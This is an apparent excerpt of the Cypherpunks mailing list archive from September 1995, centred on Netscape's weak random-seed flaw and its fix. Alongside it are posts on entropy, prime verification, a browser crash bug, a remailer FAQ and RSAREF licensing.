Netscape's commitment to excellence as evidenced by the company's immediate action in response to reported vulnerabilities is one of the many reasons Internet Shopping Network has chosen Netscape products for conducting Internet commerce," said Randy Adams, president of Internet Shopping Network. "We have built a multi-million dollar business on the Internet using Netscape products and they are a major factor in our success."

The beta versions of the updated software -- Netscape Navigator 1.2.1b for Windows, Netscape Navigator 1.1.1b for Macintosh and UNIX, Netscape Commerce Server 1.1.1b, and Netscape Proxy Server 1.1.1b -- will be available on Wednesday for downloading from Netscape's home page at http://home.netscape.com. All Netscape users are encouraged to download the new versions as soon as possible to ensure they are using the most up-to-date security software from Netscape. Final versions of the updates will be posted after all testing is complete.

Netscape Communications Corporation is a premier provider of open software to enable people and companies to exchange information and conduct commerce over the Internet and other global networks. The company was founded in April 1994 by Dr. James H. Clark, founder of Silicon Graphics, Inc., a Fortune 500 computer systems company; and Marc Andreessen, creator of the NCSA Mosaic research prototype for the Internet. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.

###

Additional information on Netscape Communications Corporation is available on the Internet at http://home.netscape.com, by sending email to info at netscape.com or by calling 415-528-2555.

Netscape Communications, the Netscape Communications logo, Netscape, Netscape Navigator, Netscape Commerce Server and Netscape Proxy Server are trademarks of Netscape Communications Corporation. All other product names are trademarks of their respective companies.
-- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. We issued the following news release this morning: ---------------------- FOR IMMEDIATE RELEASE BETA VERSIONS OF NETSCAPE SECURITY UPDATE TO BE AVAILABLE WEDNESDAY FOR FREE DOWNLOADING Company Puts New Code on Net for Examination; Outside Security Experts Reviewing Software MOUNTAIN VIEW, Calif. (September 25, 1995) -- Netscape Communications Corporation (NASDAQ: NSCP) today announced that it has completed beta versions of the security update for its client and server software and will post the new software for free downloading from the Internet on Wednesday, September 27. The beta versions of the software updates, being posted following a review by internal and outside experts, are in response to the potential vulnerability in the company's security implementation discovered last weekend by two University of California at Berkeley students. In addition, Netscape is taking the opportunity to include other improvements with this update. Netscape addressed the potential vulnerability by increasing the amount of random information it uses to seed the random number generator in its security implementation. In Netscape's security approach, the random number generated is used in a mathematical formula to create a "session key" for encrypting information to be sent across the Internet. The new solution uses many times more random information than the previous version, ensuring much greater degrees of difficulty in identifying the key used to encrypt a particular session. The solution is also now assembled in a platform-dependent manner which, when combined with the increase in random information, makes Netscape's products substantially more secure than before the update. 
Netscape's source code that will be used to address the potential vulnerability has already been posted on the Internet so that it can be reviewed by anyone wishing to do so. This technique is often used in the development of security software to ensure the highest level of inspection possible before the final software is made available to customers. The code is also being reviewed by external security experts retained by Netscape and various Netscape platform partners with expertise in specific operating system environments to provide additional checks on the soundness of Netscape's approach. "We have always encouraged users to provide feedback on new versions of our software, and our posting of this security source code on the Internet is a natural extension of that approach," said Mike Homer, vice president of marketing at Netscape. "We plan to continue to use the Internet to test new software versions, as we will shortly with the beta version of our newly announced Netscape Navigator 2.0. We expect that this kind of open review will help us continue to create products of the highest quality." Netscape is using the opportunity of this week's beta releases to also update other portions of its software, addressing such issues as domain-name limitations in international versions of Netscape Navigator� and potential stack overflow conditions. Netscape is also placing the beta versions of the security updates for its Netscape servers on the Internet for free download by customers. "We process hundreds of customer orders daily using Netscape software. Netscape's commitment to excellence as evidenced by the company's immediate action in response to reported vulnerabilities is one of the many reasons Internet Shopping Network has chosen Netscape products for conducting Internet commerce," said Randy Adams, president of Internet Shopping Network. 
"We have built a multi-million dollar business on the Internet using Netscape products and they are a major factor in our success."

The beta versions of the updated software -- Netscape Navigator 1.2.1b for Windows, Netscape Navigator 1.1.1b for Macintosh and UNIX, Netscape Commerce Server(TM) 1.1.1b, and Netscape Proxy Server(TM) 1.1.1b -- will be available on Wednesday for downloading from Netscape's home page at http://home.netscape.com. All Netscape users are encouraged to download the new versions as soon as possible to ensure they are using the most up-to-date security software from Netscape. Final versions of the updates will be posted after all testing is complete.

Netscape Communications Corporation is a premier provider of open software to enable people and companies to exchange information and conduct commerce over the Internet and other global networks. The company was founded in April 1994 by Dr. James H. Clark, founder of Silicon Graphics, Inc., a Fortune 500 computer systems company; and Marc Andreessen, creator of the NCSA Mosaic(TM) research prototype for the Internet. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.

###

Additional information on Netscape Communications Corporation is available on the Internet at http://home.netscape.com, by sending email to info at netscape.com or by calling 415-528-2555.

Netscape Communications, the Netscape Communications logo, Netscape, Netscape Navigator, Netscape Commerce Server and Netscape Proxy Server are trademarks of Netscape Communications Corporation. All other product names are trademarks of their respective companies.

Rosanne M. Siino
Director of Corporate Communications
Netscape Communications Corp.
415-528-2619

From dvw at hamachi.epr.com Mon Sep 25 16:20:48 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Mon, 25 Sep 95 16:20:48 PDT
Subject: `Random' seed.
Message-ID: <306738C3@hamachi>

Matt Blaze wrote:
>Here's my current favorite quick-and-dirty true-random-in-software generator.
>Use at own risk and read the comments carefully...
[...]
> * Physically random numbers (very nearly uniform)
> * D. P. Mitchell
> * Modified by Matt Blaze 2/95
[...]
> * WARNING: depending on the particular platform, truerand() output may
> * be biased or correlated. In general, you can expect about 16 bits of
> * "pseudo-entropy" out of each 32 bit word returned by truerand(),
> * but it may not be uniformly diffused.

While this comment provides some general information, it does not give the expected entropy in the form of testable assumptions. A first step in this direction is to provide the entropy series used to arrive at the 16 bit per 32 bit word estimate. The second step, as I recommended last week (RE: RNG Resource FAQ... on 9/22), is to provide a concise argument drawn directly from the mathematical weaknesses of the entropy series.

In that post, I posed the following four criteria because they address the mathematical (theoretical) weaknesses of the entropy series, while using a vocabulary that should be sensible to a rigorous designer:

1) The states exist and can be identified.
2) The number of states n is known.
3) The index value i uniquely identifies a state.
4) The function P_i is known and well-behaved.

In this way, an analyst can review both the entropy series itself, and a _concise_ statement of the criteria under which the series is defined (i.e. when the 4 mathematical weaknesses have been appropriately addressed), and the argument "why" has been scrutinized against the code or proposed design.

dvw

From dvw at hamachi.epr.com Mon Sep 25 16:35:08 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Mon, 25 Sep 95 16:35:08 PDT
Subject: More on "Entropy"
Message-ID: <30673C18@hamachi>

David Van Wie wrote:
>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Timothy C. May wrote:
>Hah!
>Another physicist converted to the information-theoretic view of entropy!

Indeed. I was able to track down the literature, and it is most interesting. I am still a little bit skeptical of the "superset including thermodynamic entropy" school of thought, but I haven't finished reading all of the materials yet! Clearly, the IT "version" of entropy is a well defined and useful thing....

>I should've pointed out in my reading list that several names stand out in
>this interpretation:

I'll read with that endorsement in mind. Your thoughts on rigorous, _concise_, design criteria for sources of entropy would be appreciated (unless there is good quality work in the literature I haven't come to yet).

dvw

From dvw at hamachi.epr.com Mon Sep 25 16:48:37 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Mon, 25 Sep 95 16:48:37 PDT
Subject: Netscape "random" number seed generator code available
Message-ID: <30673F3B@hamachi>

Phil Karlton wrote:
>[You will be expected to show your work. :-)]

In the spirit of showing work, how about a run through the entropy series?

dvw

From rah at shipwright.com Tue Sep 26 04:57:33 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 26 Sep 95 04:57:33 PDT
Subject: The Law of ElectronicCommerce: EDI, E-mail and Internet
Message-ID:

--- begin forwarded text

Date: Mon, 25 Sep 1995 20:49:03 -0700
From: Davidwfox at eworld.com
To: www-buyinfo at allegra.att.com, e-payment at bellcore.com
Subject: The Law of ElectronicCommerce: EDI, E-mail and Internet

FYI...

Little Brown and Co. announces release of _The Law of Electronic Commerce: EDI, E-mail and Internet_ (Second Edition) by Benjamin Wright. This 640 page book has been updated to cover the latest developments in electronic commerce, including the Utah Digital Signature Act, electronic cash, computer records, and Internet commerce. For more information, contact Little, Brown at tel: 800-331-1664; tel: +1-617-890-0250; fax: +1-617-890-0875.
The summary table of contents is available on the world wide web at http://infohaus.com/access/by-seller/Benjamin_Wright

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From drc at russell.moore.com Tue Sep 26 04:57:51 1995
From: drc at russell.moore.com (David R. Conrad)
Date: Tue, 26 Sep 95 04:57:51 PDT
Subject: New Netscape RNG
In-Reply-To: <199509250649.CAA27099@clark.net>
Message-ID:

On Mon, 25 Sep 1995, Ray Cromwell wrote:

> I just glanced at the new Netscape RNG source. I don't really see
> anything bad, but I haven't analyzed it. However, I'm curious
> as to why variables like the username or the language locality
> are used as sources of entropy. These seem to provide almost nil.

I, too, have only skimmed the code briefly.

[Lots of good stuff deleted]

> Using those sources probably can't hurt, they just seemed
> like odd choices, "grasping for straws" so to speak.

What isn't clear to me is how much entropy they are assigning to these sources. Certainly if they manage to get at least 128 bits of entropy then it doesn't matter how many non-random bits they mix into the hash. I think they are simply throwing everything but the kitchen sink in, and assuming that the overall result will be a sufficient number of bits of entropy. But it would be nice to at least see a few comments on how many bits they expect each individual source to provide.

I also noticed that they use $HOME/.pgp/randseed.bin under unix, but they don't bother with %PGPPATH%\RANDSEED.BIN on PCs. I've sent Jeff a private message about this.

David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee -- Finger conrad at grfn.org for public key
Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.

From bsimpson at morningstar.com Tue Sep 26 05:00:30 1995
From: bsimpson at morningstar.com (William Allen Simpson)
Date: Tue, 26 Sep 95 05:00:30 PDT
Subject: Primality verification needed
Message-ID: <1560.bsimpson@morningstar.com>

While you folks are poking at Phil's latest, perhaps you could verify the others that he generated, already in the Photuris internet-draft:

A 1024-bit strong prime (p), expressed in hex:

97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3
dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf
2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78
b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6
5e55 4313 828d a83b 9ff2 d941 dee9 5689
fada ea09 36ad df19 71fe 635b 20af 4703
6460 3c2d e059 f54b 650a d8fa 0cf7 0121
c747 99d7 5871 32be 9b99 9bb9 b787 e8ab

The recommended generator (g) for this prime is 2.

A 1024-bit strong prime (p), expressed in hex:

a478 8e21 84b8 d68b fe02 690e 4dbe 485b
17a8 0bc5 f21d 680f 1a84 1313 9734 f7f2
b0db 4e25 3750 018a ad9e 86d4 9b60 04bb
bcf0 51f5 2fcb 66d0 c5fc a63f bfe6 3417
3485 bbbf 7642 e9df 9c74 b85b 6855 e942
13b8 c2d8 9162 abef f434 2435 0e96 be41
edd4 2de9 9a69 6163 8c1d ac59 8bc9 0da0
69b5 0c41 4d8e b865 2adc ff4a 270d 567f

The recommended generator (g) for this prime is 5.

Bill.Simpson at um.cc.umich.edu
Key fingerprint = 2E 07 23 03 C5 62 70 D3 59 B1 4F 5E 1D C2 C1 A2

From bdolan at use.usit.net Tue Sep 26 05:01:08 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Tue, 26 Sep 95 05:01:08 PDT
Subject: Suspicious Action Reports
Message-ID:

---------- Forwarded message ----------

[...]
And as for FinCEN, it has recently become the repository for the new SAR's (Suspicious action reports) to be filed by all banking entities and replacing the multiple paperwork forms and sites, as stated in the Federal Register. One thing I noted was the expansion of surveillance responsibility for banks and other financial transaction organizations. And whether new or not, I experienced horror upon reading that financial institutions are supposed to file a SAR for any suspicious activity, as perceived by the bank, and are prohibited from disclosing the fact of the SAR to the subject and required to make financial transaction records, which must be retained for ten years, available to law enforcement "upon request" - a description which is lacking a search warrant.

The regulations in the FR, identical for all institutions, actually discussed bankers and related organizations as entering into "partnerships" with the federal gestapo in naming names. Names, that is, of people and monetary transactions that bank and other financial facilities find "suspicious" - a subjective assessment based on whatever criteria happen to be in the minds of employees.

From frissell at panix.com Tue Sep 26 05:02:10 1995
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 26 Sep 95 05:02:10 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509252047.AA01994@hplyot.obspm.fr>
Message-ID:

On Mon, 25 Sep 1995, Laurent Demailly wrote:

>
> It's not an exploit script, but you can find an auto crash "animation"
> for Ray's discovered bug on
> http://hplyot.obspm.fr/~dl/netscapesec/c1.html
> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)

Crashes the 16-bit Windows version 1.1N.

DCF

From jya at pipeline.com Tue Sep 26 05:03:03 1995
From: jya at pipeline.com (John Young)
Date: Tue, 26 Sep 95 05:03:03 PDT
Subject: NYT on Nscp Flaw 3
Message-ID: <199509261017.GAA08915@pipe4.nyc.pipeline.com>

The New York Times, September 26, 1995, p. D19.
Hackers Alert Netscape to Another Flaw

By Bloomberg Business News

Mountain View, Calif., Sept. 25 -- The Netscape Communications Corporation said today that a third flaw had been discovered in its Internet access software by a group of computer hackers who call themselves the Cypherpunks.

The hackers -- computer users and mathematicians who try to discover weaknesses in computer software and networks -- found a design flaw that can shut down Netscape's Navigator browser software, which helps people travel on the Internet.

Two American college students last week broke Netscape's software security code, a design flaw that could jeopardize financial transactions done using Navigator. A month earlier, a French hacker broke a different Netscape security code.

"We are learning a lot from these problems," said Michael J. Homer, vice president of marketing at Netscape.

Shares of the company, which sold its first stock to the public last month, rose $4.25 today to close at $67 in Nasdaq trading.

The latest flaw found by the hacker group is a programming error in Netscape software used to navigate the World Wide Web, a part of the Internet made up of photos, sounds and drawings.

End]

From mixmaster at obscura.com Tue Sep 26 05:06:50 1995
From: mixmaster at obscura.com (Mixmaster)
Date: Tue, 26 Sep 95 05:06:50 PDT
Subject: Mixmaster Remailer FAQ
Message-ID: <199509261140.EAA01736@obscura.com>

Frequently Asked Questions about Mixmaster Remailers
[FAQ Version 1.5 Sept 22 1995]
by Lance Cottrell

This document is a semi-technical discussion of Mixmaster remailers. I wrote this to answer questions often asked by new users of Mixmaster, and to explain why you would want to use Mixmaster remailers. At the end of this FAQ is a list of currently active Mixmaster remailers.

What is the most recent version of Mixmaster?

I am pleased to announce the release of Mixmaster 2.0.2. It contains many bug fixes. It also provides random remailer chaining.

What is Mixmaster?
Mixmaster is a new class of anonymous remailers. Inspired by the existing "cypherpunk" remailers and discussions on the Cypherpunk mailing list, Mixmaster is the next generation in the evolution of remailer technology.

What is an anonymous remailer?

Quoting from Andre Bacard's remailer FAQ:

An anonymous remailer (also called an "anonymous server") is a free computer service that privatizes your e-mail. A remailer allows you to send electronic mail to a Usenet news group or to a person without the recipient knowing your name or your e-mail address.

For a non-technical introduction to remailers (not including Mixmaster), I recommend Andre's FAQ. It is posted regularly to: alt.privacy, alt.privacy.anon-server, alt.anonymous

or you can get it by sending mail to:
To: abacard at well.com
Subject: Help1
Message: [Ignored]

What do I need to use Mixmaster remailers?

Unlike other remailers, you can't just make your own message and send it to the remailer. Mixmaster's security comes in part from using a special message format. The disadvantage of this is that you need a special program to make the message for you. Once you have that program (the client) remailing is as easy as running the program, and telling it which remailers you want to use.

How do I get the Mixmaster client software?

There are two sites for distribution. The first is my machine: http://obscura.com/~loki/Welcome.html/ or ftp to obscura.com and read /pub/remail/README.no-export

The other is by anonymous ftp to jpunix.com

You will have to follow the instructions there to get Mixmaster. Because Mixmaster contains cryptography, it may not be exported from the U.S. and Canada. The reason for the circuitous route to download Mixmaster is to show my good faith efforts to keep Mixmaster from being exported. I have heard rumors that someone has already broken this law, and that Mixmaster is available from Europe. I do not approve of this and will not support that site.
How do I get the software to run a Mixmaster remailer?

The remailer software is available from the same sites as the client.

But I only see one Mixmaster distribution?

The same program is used for both the client and the remailer. The only difference is in the installation. For the client you just compile it and you are ready to go. For the remailer, you need to set up mail forwarding and cron jobs.

What kinds of computers does Mixmaster run on?

Unfortunately, not PCs or Macs. But it is being ported to those right now. Mixmaster runs under UNIX. The only machine it is known not to work on is DEC Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3, Solaris, and several others. It has been compiled and tested on Netcom. If you use it on a machine or service not on this list, please let me know so I can add it.

How does Mixmaster work, and why should I use it?

You should use Mixmaster if you want the highest level of anonymity available, or if you are tired of building remailer messages yourself. A discussion of how Mixmaster provides this level of security is beyond the scope of this FAQ, but I put an essay on the subject on my home page

Does Mixmaster use PGP?

No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own keys and key file formats. To add a key to a key ring, simply append the key to your key file using your favorite text editor.

When Was Mixmaster Released?

Mixmaster was originally released on an experimental basis in late 1994. There were only ever two remailers running Mixmaster 1.0. Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly available Mixmaster remailers.

What is the latest version of Mixmaster?

Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can now accept messages containing multiple Mixmaster packets. Mixmaster can be told to choose a random set of remailers to chain your message through. It will now route multiple packet messages over independent chains. Several minor bugs were fixed.
Version 2.0.1 was released on May 27, 1995. The only changes from 2.0 are some improvements in the documentation, and the inclusion of a more up to date list of remailers.

What remailers run Mixmaster?

The most recent list of remailers is available on my homepage, along with the remailer list and key file for Mixmaster. You can simply replace your old files with the ones from my site to keep up to date. These files are in ftp://obscura.com/pub/no-export/ They are also available by ftp.

Here is the current list of Mixmaster remailers. Send mail to the remailer with the subject remailer-key to retrieve the remailer's Mixmaster key.

mix        mixmaster at obscura.com
vishnu     mixmaster at vishnu.alias.net
crown      mixmaster at kether.alias.net
knight     mixmaster at aldebaran.armory.com
robomix    robo at c2.org
hroller    hroller at c2.org
syrinx     syrinx at c2.org
replay     remailer at replay.com
hacktic    remailer at utopia.hacktic.nl
crynwr     remailer at crynwr.com
spook      remailer at spook.alias.net
flame      remailer at flame.alias.net
gondolin   mixmaster at gondolin.org
q          q at c2.org
Armadillo  remailer at armadillo.com
precipice  mixmaster at mix.precipice.com
anon       mixmaster at anon.alias.net
secrets    secret at secret.alias.net

Since this is a new FAQ, I am sure it is far from comprehensive. Watch this space for changes to the FAQ. It will be evolving rapidly for a while. Please send any questions you think should be here to: loki at obscura.com

My outpost on the WWW is

From sentiono at cycor.ca Tue Sep 26 05:23:58 1995
From: sentiono at cycor.ca (Sentiono Leowinata)
Date: Tue, 26 Sep 95 05:23:58 PDT
Subject: Netscape for OS/2, when?
(Re: Another Netscape Bug)
Message-ID: <199509261223.JAA01800@bud.peinet.pe.ca>

On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote:

>> It's not an exploit script, but you can find an auto crash "animation"
>> for Ray's discovered bug on
>> http://hplyot.obspm.fr/~dl/netscapesec/c1.html
>> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)

>Crashes the 16-bit Windows version 1.1N.

>DCF

Same here. For more information (not Netscape related), Web Explorer 1.02 for OS/2 also crashes for the long URL. I wish Netscape will port it to OS/2 (already asked them, but no comment from Netscape). I don't try it on Netscape 1.1N as it doesn't run reliably under Win-OS/2 (10 min -> crash! ;)

------------------------------------------------------
Sentiono Leowinata, Charlottetown, Prince Edward Island, Canada
System Engineer/Programmer Analyst - Cycor Communications Inc.
sentiono at cycor.ca, 902-629-2488, http://www.cycor.ca/

From craig at passport.ca Tue Sep 26 05:29:18 1995
From: craig at passport.ca (Craig Hubley)
Date: Tue, 26 Sep 95 05:29:18 PDT
Subject: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <199509202015.QAA05462@frankenstein.piermont.com>
Message-ID:

> "Vladimir Z. Nuri" writes:
> > I'm going to argue against TCM and others who are opposed to a
> > "cypherpunk press release" because this is not an "organized group".
>
> Look, L. (may I call you L.?) --
>
> we've gone over this many times. We aren't a group. We're a mailing
> list. We've got a diversity of opinions, and we have no organization
> -- nor do we want one.

True enough, but there are sometimes rough consensuses on technical questions, and if it were clear enough that these were collective in nature and not to be ascribed to any particular person, e.g.:

"Consensus on cypherpunks seems to be that 40 bit encryption is not viable for commercial applications, and that Netscape seems to have taken less than due care to choose an appropriate random seed for its session keys."
--
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig at hubley.com    416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5

From craig at passport.ca Tue Sep 26 05:30:22 1995
From: craig at passport.ca (Craig Hubley)
Date: Tue, 26 Sep 95 05:30:22 PDT
Subject: Cypherpunks Press release
In-Reply-To:
Message-ID:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think it's

Heh. Seems so.

> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.

Damn fine idea, but how do a bunch of (p)anarchists choose a mouthpiece? Should we assign someone to be 'our' lawyer?

I'd volunteer to be 'spokespunk', I've certainly been interviewed for TV and print enough, and know how to handle and present myself to the press, but if this is considered an 'honor' rather than a 'pain in the ass and potential legal lightning rod' then I'd like to suggest someone with a longer pedigree who has been writing more code lately take it on. Tim?

> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.

Sure.

--
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig at hubley.com    416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5

From drc at russell.moore.com Tue Sep 26 05:42:01 1995
From: drc at russell.moore.com (David R. Conrad)
Date: Tue, 26 Sep 95 05:42:01 PDT
Subject: Netscape "random" number seed generator code available
In-Reply-To: <199509251159.EAA08528@mycroft.rand.org>
Message-ID:

On Mon, 25 Sep 1995, Jim Gillogly wrote:

>
> jsw at neon.netscape.com (Jeff Weinstein) writes:
> > More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin,
> > and feed it through the RNG hash.
>
> Interesting idea, but I have a (perhaps irrational) dislike for this idea.
> If Netscape wants to have its own netsceed.bin file to muck around with on
> my system, I'll authorize it to be set up, but I by god don't want it
> mucking around with my PGP setup. ...

I thought about this a bit, but I don't think that reading randseed.bin counts as "mucking around with" the "PGP setup." PGP launders randseed.bin before saving it for just this reason, so that reading it won't reveal information on the user's session keys. And the Netscape folks have published the source code which shows that they only read the file and hash it with MD5. That the contents of randseed.bin have been mixed into an MD5 hash with a bunch of other things can hardly be called a security hole, in my estimation.

David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee -- Finger conrad at grfn.org for public key
Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.

From wb8foz at nrk.com Tue Sep 26 05:58:03 1995
From: wb8foz at nrk.com (David Lesher)
Date: Tue, 26 Sep 95 05:58:03 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509220814.AA06967@cs.umass.edu>
Message-ID: <199509260411.AAA00090@nrk.com>

I gather the Wall Street Journal is subscribed to 'punks -- seeing as how I hear they were discussing the overflow bug today.
--
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

From tcmay at got.net Tue Sep 26 05:59:15 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 26 Sep 95 05:59:15 PDT
Subject: More on "Entropy"
Message-ID:

At 5:29 PM 9/25/95, David Van Wie wrote:
>David Van Wie wrote:
>
>>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),
>
>Timothy C. May wrote:
>
>>Hah! Another physicist converted to the information-theoretic view of
>entropy!
>
>Indeed. I was able to track down the literature, and it is most
>interesting. I am still a little bit skeptical of the "superset including
>thermodynamic entropy" school of thought, but I haven't finished reading all
>of the materials yet! Clearly, the IT "version" of entropy is a well
>defined and useful thing....

Well, the more you adapt to the information theory point of view, the more the Shannon-Kolmogorov-Chaitin definitions become the natural ones, then the more the whole "thermodynamic" definition of entropy will seem the odd one. One is left with the conclusion that Gibbs-style entropy has _something_ fundamental to do with information theory, and can then consider what those relationships may be.

But, perforce, one is left with the most basic interpretation of algorithmic complexity: the complexity of a system is related to the length of the algorithm describing it. A "random" system is one which has no shorter algorithmic description than itself.

(The connection of this statement to IQ test questions about describing a sequence is left as an IQ test question for the reader.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From ChristopherA at consensus.com Tue Sep 26 06:00:33 1995
From: ChristopherA at consensus.com (Christopher Allen)
Date: Tue, 26 Sep 95 06:00:33 PDT
Subject: Please send me SSL problems...
Message-ID:

At 3:04 AM 9/20/95, Jeff Weinstein wrote:
> I'd just like to let all cypherpunks know that I'm really interested in
>getting any feedback you might have about security problems with Netscape
>products. I'm particularly interested in bugs in the our implementation
>of SSL, and problems in the protocol that are not addressed in SSL 3.0.
>
> We have been collecting comments on SSL 3.0, and have started incorporating
>that feedback into our spec. Please don't assume that our lack of response
>means that we are ignoring your comments. Between Navigator 2.0 and
>things like the SSL challenge and the RNG fire drill, we just have not had
>the time to get a new rev of the spec out. Hopefully soon...

As you may know, Jonathan, who is an active member of this list, has already written about Consensus' intention to continue to upgrade RSAREF. We'd like to help make sure that RSAREF stays in sync with SSLREF as we upgrade it. For instance, the next major release of RSAREF will be encrypting the private key (which now has to be done outside of RSAREF.)

One area in particular we could use some feedback on from you: Currently SSLREF makes 4 calls that are not in the published program interface of RSAREF. These calls are DES_CBCInit, DES_CBCUpdate, RSAPublicEncrypt, RSAPrivateEncrypt.
With your license with RSA for RSAREF you are allowed to go under the published interface by using the DES routines only for securing the channel, and the RSA routines are limited to endpoint authentication only.

>From what I've heard, SSLREF 3.0 may go beyond those limits, requiring SSLREF 3.0 developers only to use RSA's BSAFE rather than the less expensive (or at least, no up-front fee) RSAREF.

What Consensus Development would like to do is extend the RSAREF API such that RSA's concerns as regards direct access to those routines are taken care of, and it can be called by non-PEM/non-Mail applications such as SSLREF. We need to extend the API for PGP, so ideally anything new we add to the API should be as general purpose as possible, yet also deal with RSA's issues.

BTW, to explain RSA's issues regarding the RSAREF API: Consensus is contractually required to get prior approval before licensing RSAREF for any program that goes underneath the published API. This allows RSA to make sure that these routines are not used in patented ways that RSA does not have rights to. Designing a new API and getting them to sign off on the new API allows us to offer licenses to anyone without getting RSA's prior approval.

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..                                   1563 Solano Avenue #355..
..                                   Berkeley, CA 94707-2116..
..                                   o510/559-1500 f510/559-1505..

From rjc at clark.net Tue Sep 26 06:10:22 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 26 Sep 95 06:10:22 PDT
Subject: Hack Microsoft?
Message-ID: <199509260404.AAA14297@clark.net>

Microsoft recently got C2-security status approved for Windows NT by the National Computer Security Center, a division of the NSA. They are supposed to put systems through "laborious testing and review" before they approve C2.
So, if one can find bugs in NT's security, one can toss a little more egg on the NSA's face and the sham that part of their activities is to *help* to secure American computers. A simple violation of NT's C2 status would be to demonstrate a flaw in its memory protection implementation. Personally, I think NT is *riddled* with bugs waiting to be discovered. Hell, even the NT "service pack" is included in the C2 status, which I bet has plenty of holes. If Cypherpunks can find flaws that the NSA can't, or won't divulge, what does that say about their so-called COMSEC ability.

-Ray

From hugh at ecotone.toad.com Tue Sep 26 06:10:41 1995
From: hugh at ecotone.toad.com (Hugh Daniel)
Date: Tue, 26 Sep 95 06:10:41 PDT
Subject: ADMIN: Sudden CP Vacation, rest up while you can...
Message-ID: <9509261309.AA04686@ecotone.toad.com>

Toad.com (the cypherpunks host machine provided by John Gilmore) was down today for about 12 hours due to disk/netnews problems, and not the NSA or little green men (is there a difference...? :r)

||ugh Daniel
Majordomo Potty Trainer
Owner-Cypherpunks at toad.com
hugh at toad.com

From shamrock at netcom.com Tue Sep 26 06:10:53 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:10:53 PDT
Subject: Netscape "random" number seed generator code available
Message-ID: <199509260259.WAA20138@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199509251159.EAA08528 at mycroft.rand.org>, jim at acm.org (Jim Gillogly) wrote:

>I'm nervous enough about all the Easter Eggs that have been reported in
>Netscape, like the secret keystroke shortcut to get to Fishcam, or the
>different behavior it exhibits when it finds a certain obscurely-named
>directory at the top level.

Would you please elaborate?

TIA,

- --
- -- Lucky Green PGP encrypted mail preferred.

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGdsfSoZzwIn1bdtAQG3ZwGAk5ZFceYsUmo9OgQJ9oVZGcNcXnorr9a2
cLP/xy3vB/COr3uKjfr0mcYY6JMMLxfa
=nXHi
-----END PGP SIGNATURE-----

From shamrock at netcom.com Tue Sep 26 06:11:23 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:11:23 PDT
Subject: Security Update news release
Message-ID: <199509260306.XAA20157@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <9509251617.ZM167 at tofuhut>, jsw at netscape.com ("Jeff Weinstein") wrote:

>--
>--PART-BOUNDARY=.19509251617.ZM167.tofuhut
